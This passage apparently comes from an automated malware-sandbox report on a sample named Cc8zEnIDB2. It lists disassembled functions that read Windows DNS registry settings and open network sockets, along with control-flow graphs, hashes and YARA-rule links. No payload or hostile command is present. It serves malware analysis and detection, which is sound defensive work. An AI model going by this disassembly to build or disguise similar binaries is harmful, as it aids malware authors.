                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: recvfrom
                                                      • String ID:
                                                      • API String ID: 846543921-0
                                                      • Opcode ID: dbd246c05fd3d64f0acbfd5ad75c996e080b5304bbfc25c509161c9b1a506fcd
                                                      • Instruction ID: 732e81a2d72edf84fddaccff33961a6842587030aaeae7535290c0dd8b133758
                                                      • Opcode Fuzzy Hash: dbd246c05fd3d64f0acbfd5ad75c996e080b5304bbfc25c509161c9b1a506fcd
                                                      • Instruction Fuzzy Hash: EDF06D75108308AFD6109E01DC48D6BBBEDFFC9758F05496DF948232118370AE10CAB2
                                                      Function 0058A440 Relevance: 48.3, APIs: 19, Strings: 8, Instructions: 1066registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0058AA19
                                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0058AA4C
                                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0058AA97
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0058AAE9
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0058AB30
                                                      • RegCloseKey.KERNELBASE(?), ref: 0058AB6A
                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0058AB82
                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0058AC46
                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0058AD0A
                                                      • RegEnumKeyExA.KERNELBASE ref: 0058AD8D
                                                      • RegCloseKey.KERNELBASE(?), ref: 0058ADD9
                                                      • RegEnumKeyExA.KERNELBASE ref: 0058AE08
                                                      • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0058AE2A
                                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0058AE54
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0058AF63
                                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0058AFB2
                                                      • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0058B072
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: QueryValue$Open$CloseEnum
                                                      • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                      • API String ID: 4217438148-1047472027
                                                      • Opcode ID: 42826f73ea8c038b3de82fee019bebdbed0ffa2d361b516c6b5b26517174e2d0
                                                      • Instruction ID: f7717f6b16ea24ff046a0aea09464dafcb7db945ebec764f8316e36708037fcd
                                                      • Opcode Fuzzy Hash: 42826f73ea8c038b3de82fee019bebdbed0ffa2d361b516c6b5b26517174e2d0
                                                      • Instruction Fuzzy Hash: D1728DB1605301AFF720EB24CC85B6B7BE8BF85700F144829F985AB2A1E775E945CB53
                                                      Function 0050A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0050A832
                                                      Strings
                                                      • Could not set TCP_NODELAY: %s, xrefs: 0050A871
                                                      • Local Interface %s is ip %s using address family %i, xrefs: 0050AE60
                                                      • cf-socket.c, xrefs: 0050A5CD, 0050A735
                                                      • @, xrefs: 0050AC42
                                                      • @, xrefs: 0050A8F4
                                                      • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0050AD0A
                                                      • Trying [%s]:%d..., xrefs: 0050A689
                                                      • Couldn't bind to '%s' with errno %d: %s, xrefs: 0050AE1F
                                                      • Name '%s' family %i resolved to '%s' family %i, xrefs: 0050ADAC
                                                      • cf_socket_open() -> %d, fd=%d, xrefs: 0050A796
                                                      • Trying %s:%d..., xrefs: 0050A7C2, 0050A7DE
                                                      • Bind to local port %d failed, trying next, xrefs: 0050AFE5
                                                      • Local port: %hu, xrefs: 0050AF28
                                                      • bind failed with errno %d: %s, xrefs: 0050B080
                                                      • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0050A6CE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: setsockopt
                                                      • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                      • API String ID: 3981526788-2373386790
                                                      • Opcode ID: 9e432993e0d3794163eaea7b9e95057c6d8869c646771ba4542db0a795bf0026
                                                      • Instruction ID: 6b5e8e65240fec632ef3bb9c43adb30082adc4873b04e38c718c12c5284b62e4
                                                      • Opcode Fuzzy Hash: 9e432993e0d3794163eaea7b9e95057c6d8869c646771ba4542db0a795bf0026
                                                      • Instruction Fuzzy Hash: 8462D271504381ABE721CF24C846BAFBBE4FF95314F044929F98897292E771E945CB93
                                                      Function 00599740 Relevance: 16.5, APIs: 3, Strings: 6, Instructions: 743registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 955 599740-59975b 956 59975d-599768 call 5978a0 955->956 957 599780-599782 955->957 965 5999bb-5999c0 956->965 966 59976e-599770 956->966 959 599788-5997a0 call 858e00 call 5978a0 957->959 960 599914-59994e call 858b70 RegOpenKeyExA 957->960 959->965 971 5997a6-5997c5 959->971 968 59995a-599992 RegQueryValueExA RegCloseKey call 858b98 960->968 969 599950-599955 960->969 972 599a0c-599a15 965->972 970 599772-59977e 966->970 966->971 985 599997-5999b5 call 5978a0 968->985 969->972 970->959 978 599827-599833 971->978 979 5997c7-5997e0 971->979 981 59985f-599872 call 595ca0 978->981 982 599835-59985c call 58e2b0 * 2 978->982 983 5997e2-5997f3 call 858b50 979->983 984 5997f6-599809 979->984 996 599878-59987d call 5977b0 981->996 997 5999f0 981->997 982->981 983->984 984->978 995 59980b-599810 984->995 985->965 985->971 995->978 1000 599812-599822 995->1000 1004 599882-599889 996->1004 999 5999f5-5999fb call 595d00 997->999 1010 5999fe-599a09 999->1010 1000->972 1004->999 1008 59988f-59989b call 584fe0 1004->1008 1008->997 1013 5998a1-5998c3 call 858b50 call 5978a0 1008->1013 1010->972 1019 5998c9-5998db call 58e2d0 1013->1019 1020 5999c2-5999ed call 58e2b0 * 2 1013->1020 1019->1020 1025 5998e1-5998f0 call 58e2d0 1019->1025 1020->997 1025->1020 1031 5998f6-599905 call 5963f0 1025->1031 1035 59990b-59990f 1031->1035 1036 599f66-599f7f call 595d00 1031->1036 1037 599a3f-599a5a call 596740 call 5963f0 1035->1037 1036->1010 1037->1036 1044 599a60-599a6e call 596d60 1037->1044 1047 599a1f-599a39 call 596840 call 5963f0 1044->1047 1048 599a70-599a94 call 596200 call 5967e0 call 596320 1044->1048 1047->1036 1047->1037 1059 599a16-599a19 1048->1059 1060 599a96-599ac6 call 58d120 1048->1060 1059->1047 1062 599fc1 1059->1062 1065 599ac8-599adb call 58d120 1060->1065 1066 599ae1-599af7 call 58d190 1060->1066 1064 599fc5-599ffd call 595d00 call 58e2b0 * 2 1062->1064 1064->1010 1065->1047 1065->1066 1066->1047 1074 599afd-599b09 call 584fe0 1066->1074 1074->1062 1080 599b0f-599b29 call 58e730 1074->1080 1084 599b2f-599b3a call 5978a0 1080->1084 1085 599f84-599f88 1080->1085 1084->1085 1092 599b40-599b54 call 58e760 1084->1092 1087 599f95-599f99 1085->1087 1089 599f9b-599f9e 1087->1089 1090 599fa0-599fb6 call 58ebf0 * 2 1087->1090 1089->1062 1089->1090 1102 599fb7-599fbe 1090->1102 1098 599f8a-599f92 1092->1098 1099 599b5a-599b6e call 58e730 1092->1099 1098->1087 1105 599b8c-599b97 call 5963f0 1099->1105 1106 599b70-59a004 1099->1106 1102->1062 1112 599c9a-599cab call 58ea00 1105->1112 1113 599b9d-599bbf call 596740 call 5963f0 1105->1113 1111 59a015-59a01d 1106->1111 1114 59a01f-59a022 1111->1114 1115 59a024-59a045 call 58ebf0 * 2 1111->1115 1124 599f31-599f35 1112->1124 1125 599cb1-599ccd call 58ea00 call 58e960 1112->1125 1113->1112 1132 599bc5-599bda call 596d60 1113->1132 1114->1064 1114->1115 1115->1064 1127 599f40-599f61 call 58ebf0 * 2 1124->1127 1128 599f37-599f3a 1124->1128 1141 599cfd-599d0e call 58e960 1125->1141 1142 599ccf 1125->1142 1127->1047 1128->1047 1128->1127 1132->1112 1144 599be0-599bf4 call 596200 call 5967e0 1132->1144 1153 599d10 1141->1153 1154 599d53-599d55 1141->1154 1145 599cd1-599cec call 58e9f0 call 58e4a0 1142->1145 1144->1112 1163 599bfa-599c0b call 596320 1144->1163 1165 599cee-599cfb call 58e9d0 1145->1165 1166 599d47-599d51 1145->1166 1158 599d12-599d2d call 58e9f0 call 58e4a0 1153->1158 1157 599e69-599e8e call 58ea40 call 58e440 1154->1157 1183 599e90-599e92 1157->1183 1184 599e94-599eaa call 58e3c0 1157->1184 1180 599d5a-599d6f call 58e960 1158->1180 1181 599d2f-599d3c call 58e9d0 1158->1181 1175 599c11-599c1c call 597b70 1163->1175 1176 599b75-599b86 call 58ea00 1163->1176 1165->1141 1165->1145 1172 599dca-599ddb call 58e960 1166->1172 1193 599ddd-599ddf 1172->1193 1194 599e2e-599e36 1172->1194 1175->1105 1197 599c22-599c33 call 58e960 1175->1197 1176->1105 1202 599f2d 1176->1202 1211 599d71-599d73 1180->1211 1212 599dc2 1180->1212 1181->1158 1208 599d3e-599d42 1181->1208 1190 599eb3-599ec4 call 58e9c0 1183->1190 1205 59a04a-59a04c 1184->1205 1206 599eb0-599eb1 1184->1206 1190->1047 1215 599eca-599ed0 1190->1215 1203 599e06-599e21 call 58e9f0 call 58e4a0 1193->1203 1199 599e38-599e3b 1194->1199 1200 599e3d-599e5b call 58ebf0 * 2 1194->1200 1224 599c35 1197->1224 1225 599c66-599c75 call 5978a0 1197->1225 1199->1200 1213 599e5e-599e67 1199->1213 1200->1213 1202->1124 1239 599de1-599dee call 58ec80 1203->1239 1240 599e23-599e2c call 58eac0 1203->1240 1218 59a04e-59a051 1205->1218 1219 59a057-59a070 call 58ebf0 * 2 1205->1219 1206->1190 1208->1157 1220 599d9a-599db5 call 58e9f0 call 58e4a0 1211->1220 1212->1172 1213->1157 1213->1190 1223 599ee5-599ef2 call 58e9f0 1215->1223 1218->1062 1218->1219 1219->1102 1253 599d75-599d82 call 58ec80 1220->1253 1254 599db7-599dc0 call 58eac0 1220->1254 1223->1047 1247 599ef8-599f0e call 58e440 1223->1247 1232 599c37-599c51 call 58e9f0 1224->1232 1243 599c7b-599c8f call 58e7c0 1225->1243 1244 59a011 1225->1244 1232->1105 1269 599c57-599c64 call 58e9d0 1232->1269 1257 599df1-599e04 call 58e960 1239->1257 1240->1257 1243->1105 1264 599c95-59a00e 1243->1264 1244->1111 1267 599f10-599f26 call 58e3c0 1247->1267 1268 599ed2-599edf call 58e9e0 1247->1268 1273 599d85-599d98 call 58e960 1253->1273 1254->1273 1257->1194 1257->1203 1264->1244 1267->1268 1281 599f28 1267->1281 1268->1047 1268->1223 1269->1225 1269->1232 1273->1212 1273->1220 1281->1062
                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00599946
                                                      • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00599974
                                                      • RegCloseKey.KERNELBASE(?), ref: 0059998B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                      • API String ID: 3677997916-615551945
                                                      • Opcode ID: 7db84bfaf6f7456a7260432a16765b382a06b64af81ad50409a2c74ce0e69b5c
                                                      • Instruction ID: a185838ecea160ac0a5f8a0516254eff9177e96371a939e60c096fb786ea42b9
                                                      • Opcode Fuzzy Hash: 7db84bfaf6f7456a7260432a16765b382a06b64af81ad50409a2c74ce0e69b5c
                                                      • Instruction Fuzzy Hash: 623288B5904202ABEF11AB24EC46A1B7FA9BF95354F084838FD0996263F731ED15C793
                                                      Function 00508B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1283 508b50-508b69 1284 508be6 1283->1284 1285 508b6b-508b74 1283->1285 1286 508be9 1284->1286 1287 508b76-508b8d 1285->1287 1288 508beb-508bf2 1285->1288 1286->1288 1289 508bf3-508bfe call 50a550 1287->1289 1290 508b8f-508ba7 call 4e6e40 1287->1290 1295 508de4-508def 1289->1295 1296 508c04-508c08 1289->1296 1297 508cd9-508d16 SleepEx getsockopt 1290->1297 1298 508bad-508baf 1290->1298 1301 508df5-508e19 call 50a150 1295->1301 1302 508e8c-508e95 1295->1302 1303 508dbd-508dc3 1296->1303 1304 508c0e-508c1d 1296->1304 1299 508d22 1297->1299 1300 508d18-508d20 1297->1300 1305 508bb5-508bb9 1298->1305 1306 508ca6-508cb0 1298->1306 1307 508d26-508d39 1299->1307 1300->1307 1343 508e88 1301->1343 1344 508e1b-508e26 1301->1344 1308 508f00-508f06 1302->1308 1309 508e97-508e9c 1302->1309 1303->1286 1311 508c35-508c48 call 50a150 1304->1311 1312 508c1f-508c34 connect 1304->1312 1305->1288 1314 508bbb-508bc2 1305->1314 1306->1297 1313 508cb2-508cb8 1306->1313 1316 508d43-508d61 call 4ed8c0 call 50a150 1307->1316 1317 508d3b-508d3d 1307->1317 1308->1288 1318 508e9e-508eb6 call 4e2a00 1309->1318 1319 508edf-508eef call 4d78b0 1309->1319 1338 508c4d-508c4f 1311->1338 1312->1311 1321 508ddc-508dde 1313->1321 1322 508cbe-508cd4 call 50b180 1313->1322 1314->1288 1323 508bc4-508bcc 1314->1323 1350 508d66-508d74 1316->1350 1317->1316 1317->1321 1318->1319 1342 508eb8-508edd call 4e3410 * 2 1318->1342 1340 508ef2-508efc 1319->1340 1321->1286 1321->1295 1322->1295 1324 508bd4-508bda 1323->1324 1325 508bce-508bd2 1323->1325 1324->1288 1331 508bdc-508be1 1324->1331 1325->1288 1325->1324 1339 508dac-508db8 call 5150a0 1331->1339 1347 508c51-508c58 1338->1347 1348 508c8e-508c93 1338->1348 1339->1288 1340->1308 1342->1340 1343->1302 1345 508e28-508e2c 1344->1345 1346 508e2e-508e85 call 4ed090 call 514fd0 1344->1346 1345->1343 1345->1346 1346->1343 1347->1348 1353 508c5a-508c62 1347->1353 1355 508dc8-508dd9 call 50b100 1348->1355 1356 508c99-508c9f 1348->1356 1350->1288 1357 508d7a-508d81 1350->1357 1360 508c64-508c68 1353->1360 1361 508c6a-508c70 1353->1361 1355->1321 1356->1306 1357->1288 1363 508d87-508d8f 1357->1363 1360->1348 1360->1361 1361->1348 1366 508c72-508c8b call 5150a0 1361->1366 1368 508d91-508d95 1363->1368 1369 508d9b-508da1 1363->1369 1366->1348 1368->1288 1368->1369 1369->1288 1370 508da7 1369->1370 1370->1339
                                                      APIs
                                                      • connect.WS2_32(?,?,00000001), ref: 00508C2F
                                                      • SleepEx.KERNELBASE(00000000,00000000), ref: 00508CF3
                                                      • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00508D0F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: Sleepconnectgetsockopt
                                                      • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                      • API String ID: 1669343778-879669977
                                                      • Opcode ID: 7732952b28f8e0c600fdc7128a2c7702d20d91c87a3ff2a35ca899d7babf8f00
                                                      • Instruction ID: 01046e3aadc1e73b20596f500b997f409cbd74f7b1011a78eca938ff9b2c3f58
                                                      • Opcode Fuzzy Hash: 7732952b28f8e0c600fdc7128a2c7702d20d91c87a3ff2a35ca899d7babf8f00
                                                      • Instruction Fuzzy Hash: 56B1B0706047469FEB10CF24C885FBA7BA4BF95318F048A2DE8994B2D2DB70EC44C761
                                                      Function 004D2F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1477 4d2f17-4d2f8c call 90f570 call 90f960 1482 4d31c9-4d31cd 1477->1482 1483 4d2f91-4d2ff4 call 4d1619 RegOpenKeyExA 1482->1483 1484 4d31d3-4d31d6 1482->1484 1487 4d2ffa-4d300b 1483->1487 1488 4d31c5 1483->1488 1489 4d315c-4d31ac RegEnumKeyExA 1487->1489 1488->1482 1490 4d3010-4d3083 call 4d1619 RegOpenKeyExA 1489->1490 1491 4d31b2-4d31c2 RegCloseKey 1489->1491 1494 4d314e-4d3152 1490->1494 1495 4d3089-4d30d4 RegQueryValueExA 1490->1495 1491->1488 1494->1489 1496 4d313b-4d314b RegCloseKey 1495->1496 1497 4d30d6-4d3137 call 90f840 call 90f8d0 call 90f960 call 90f770 call 90f960 call 90dce0 1495->1497 1496->1494 1497->1496
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmpDownload File
